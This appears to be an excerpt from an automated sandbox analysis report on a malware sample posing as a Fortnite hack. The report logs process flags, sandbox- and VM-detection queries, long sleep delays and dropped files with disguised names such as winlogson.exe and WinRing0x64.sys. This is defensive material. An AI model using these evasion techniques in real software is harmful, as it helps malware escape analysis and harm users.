Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Memory allocated: 1550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Memory allocated: 3350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Memory allocated: 31B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Window / User API: threadDelayed 6292	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Window / User API: threadDelayed 2368	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7502	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2107	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Dropped PE file which has not been started: C:\ProgramData\Dllhost\WinRing0x64.sys			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Dropped PE file which has not been started: C:\ProgramData\Dllhost\winlogson.exe			Jump to dropped file

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe TID: 2012	Thread sleep time: -210000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe TID: 7580	Thread sleep count: 6292 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7960	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7960	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7964	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7960	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 8084	Thread sleep count: 2368 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7960	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7960	Thread sleep time: -599641s >= -30000s	Jump to behavior
